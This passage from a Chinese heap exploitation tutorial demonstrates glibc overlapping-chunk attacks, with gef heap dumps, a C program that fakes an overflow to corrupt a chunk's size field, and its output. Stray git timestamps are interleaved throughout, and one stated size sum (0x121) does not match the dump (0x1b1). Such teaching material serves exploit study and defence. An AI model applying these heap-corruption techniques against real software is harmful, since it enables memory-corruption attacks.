0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 < -- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 < -- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x90, flags=PREV_INUSE)
```
chunk 2 被放到了 unsorted bin 中,其 size 值为 0x90。
接下来,假设我们有一个溢出漏洞,可以改写 chunk 2 的 size 值,比如这里我们将其改为 0x111,
```
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602090, bk=0x602090
→ Chunk(addr=0x6020a0, size=0x110, flags=PREV_INUSE)
```
这时 unsorted bin 中的数据也更改了。
接下来 malloc 一个大小的等于 chunk 2 和 chunk 3 之和的 chunk 4,
```
gef➤ x/60gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000091 < -- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x4141414141414141
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x0000000000000111 < -- chunk 4
0x6020a0: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x6020b0: 0x4141414141414141 0x4141414141414141
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x0000000000000090 0x0000000000000080 < -- chunk 3
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x4141414141414141
0x602150: 0x4141414141414141 0x4141414141414141
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x0000000000020e61 < -- top chunk
0x6021b0: 0x0000000000000000 0x0000000000000000
0x6021c0: 0x0000000000000000 0x0000000000000000
0x6021d0: 0x0000000000000000 0x0000000000000000
```
这样,相当于 chunk 4 和 chunk 3 就重叠了,两个 chunk 可以互相修改对方的数据。就像上面的运行结果打印出来的那样。
2018-01-12 23:12:48 +07:00
#### overlapping_chunks_2
2018-01-14 21:33:28 +07:00
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
2018-01-12 23:12:48 +07:00
2018-01-14 21:33:28 +07:00
int main() {
intptr_t *p1,*p2,*p3,*p4,*p5,*p6;
unsigned int real_size_p1,real_size_p2,real_size_p3,real_size_p4,real_size_p5,real_size_p6;
int prev_in_use = 0x1;
p1 = malloc(0x10);
p2 = malloc(0x80);
p3 = malloc(0x80);
p4 = malloc(0x80);
p5 = malloc(0x10);
real_size_p1 = malloc_usable_size(p1);
real_size_p2 = malloc_usable_size(p2);
real_size_p3 = malloc_usable_size(p3);
real_size_p4 = malloc_usable_size(p4);
real_size_p5 = malloc_usable_size(p5);
memset(p1, 'A', real_size_p1);
memset(p2, 'A', real_size_p2);
memset(p3, 'A', real_size_p3);
memset(p4, 'A', real_size_p4);
memset(p5, 'A', real_size_p5);
fprintf(stderr, "Now we allocate 5 chunks on the heap\n\n");
fprintf(stderr, "chunk p1: %p ~ %p\n", p1, (unsigned char *)p1+malloc_usable_size(p1));
fprintf(stderr, "chunk p2: %p ~ %p\n", p2, (unsigned char *)p2+malloc_usable_size(p2));
fprintf(stderr, "chunk p3: %p ~ %p\n", p3, (unsigned char *)p3+malloc_usable_size(p3));
fprintf(stderr, "chunk p4: %p ~ %p\n", p4, (unsigned char *)p4+malloc_usable_size(p4));
fprintf(stderr, "chunk p5: %p ~ %p\n", p5, (unsigned char *)p5+malloc_usable_size(p5));
free(p4);
fprintf(stderr, "\nLet's free the chunk p4\n\n");
fprintf(stderr, "Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)\n\n");
*(unsigned int * )((unsigned char *)p1 + real_size_p1) = real_size_p2 + real_size_p3 + prev_in_use + sizeof(size_t) * 2; // BUG HERE
free(p2);
p6 = malloc(0x1b0 - 0x10);
real_size_p6 = malloc_usable_size(p6);
fprintf(stderr, "Allocating a new chunk 6: %p ~ %p\n\n", p6, (unsigned char *)p6+real_size_p6);
fprintf(stderr, "Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)\n");
fprintf(stderr, "p3 before = %s\n", (char *)p3);
memset(p6, 'B', 0xd0);
fprintf(stderr, "p3 after = %s\n", (char *)p3);
}
```
```
$ gcc -g overlapping_chunks_2.c
$ ./a.out
Now we allocate 5 chunks on the heap
chunk p1: 0x18c2010 ~ 0x18c2028
chunk p2: 0x18c2030 ~ 0x18c20b8
chunk p3: 0x18c20c0 ~ 0x18c2148
chunk p4: 0x18c2150 ~ 0x18c21d8
chunk p5: 0x18c21e0 ~ 0x18c21f8
Let's free the chunk p4
2018-01-12 23:12:48 +07:00
2018-01-14 21:33:28 +07:00
Emulating an overflow that can overwrite the size of chunk p2 with (size of chunk_p2 + size of chunk_p3)
2018-01-12 23:12:48 +07:00
2018-01-14 21:33:28 +07:00
Allocating a new chunk 6: 0x18c2030 ~ 0x18c21d8
Now p6 and p3 are overlapping, if we memset(p6, 'B', 0xd0)
p3 before = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<41>
p3 after = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<41>
```
同样是堆块重叠的问题,前面那个是在 chunk 已经被 free,
我们需要五个堆块,假设第 chunk 1 存在溢出,可以改写第二个 chunk 2 的数据,
```
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 < -- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x0000000000000091 < -- chunk 2
0x602030: 0x4141414141414141 0x4141414141414141
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 < -- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 < -- chunk 4 [ be freed ]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x0000000000000090 0x0000000000000020 < -- chunk 5 < -- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 < -- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602140, bk=0x602140
→ Chunk(addr=0x602150, size=0x90, flags=PREV_INUSE)
```
free chunk 4 被放入 unsorted bin,
接下来是最关键的一步,利用 chunk 1 的溢出漏洞,将 chunk 2 的 size 值修改为 chunk 2 和 chunk 3 的大小之和,即 0x90+0x90+0x1=0x121, , , ,
```
gef➤ x/70gx 0x602010-0x10
0x602000: 0x0000000000000000 0x0000000000000021 < -- chunk 1
0x602010: 0x4141414141414141 0x4141414141414141
0x602020: 0x4141414141414141 0x00000000000001b1 < -- chunk 2 [ be freed ] < -- unsorted bin
0x602030: 0x00007ffff7dd1b78 0x00007ffff7dd1b78 < -- fd , bk pointer
0x602040: 0x4141414141414141 0x4141414141414141
0x602050: 0x4141414141414141 0x4141414141414141
0x602060: 0x4141414141414141 0x4141414141414141
0x602070: 0x4141414141414141 0x4141414141414141
0x602080: 0x4141414141414141 0x4141414141414141
0x602090: 0x4141414141414141 0x4141414141414141
0x6020a0: 0x4141414141414141 0x4141414141414141
0x6020b0: 0x4141414141414141 0x0000000000000091 < -- chunk 3
0x6020c0: 0x4141414141414141 0x4141414141414141
0x6020d0: 0x4141414141414141 0x4141414141414141
0x6020e0: 0x4141414141414141 0x4141414141414141
0x6020f0: 0x4141414141414141 0x4141414141414141
0x602100: 0x4141414141414141 0x4141414141414141
0x602110: 0x4141414141414141 0x4141414141414141
0x602120: 0x4141414141414141 0x4141414141414141
0x602130: 0x4141414141414141 0x4141414141414141
0x602140: 0x4141414141414141 0x0000000000000091 < -- chunk 4 [ be freed ]
0x602150: 0x00007ffff7dd1b78 0x00007ffff7dd1b78
0x602160: 0x4141414141414141 0x4141414141414141
0x602170: 0x4141414141414141 0x4141414141414141
0x602180: 0x4141414141414141 0x4141414141414141
0x602190: 0x4141414141414141 0x4141414141414141
0x6021a0: 0x4141414141414141 0x4141414141414141
0x6021b0: 0x4141414141414141 0x4141414141414141
0x6021c0: 0x4141414141414141 0x4141414141414141
0x6021d0: 0x00000000000001b0 0x0000000000000020 < -- chunk 5 < -- prev_size
0x6021e0: 0x4141414141414141 0x4141414141414141
0x6021f0: 0x4141414141414141 0x0000000000020e11 < -- top chunk
0x602200: 0x0000000000000000 0x0000000000000000
0x602210: 0x0000000000000000 0x0000000000000000
0x602220: 0x0000000000000000 0x0000000000000000
gef➤ heap bins unsorted
[ Unsorted Bin for arena 'main_arena' ]
[+] unsorted_bins[0]: fw=0x602020, bk=0x602020
→ Chunk(addr=0x602030, size=0x1b0, flags=PREV_INUSE)
```
现在 unsorted bin 里的 chunk 的大小为 0x1b0, ,
2018-01-12 23:12:48 +07:00
2018-01-14 21:33:28 +07:00
最后,如果我们分配一块大小为 0x1b0-0x10 的大空间,返回的堆块即是包括了 chunk 2 + chunk 3 + chunk 4 的大 chunk。这时 chunk 6 和 chunk 3 就重叠了,结果就像上面运行时打印出来的一样。
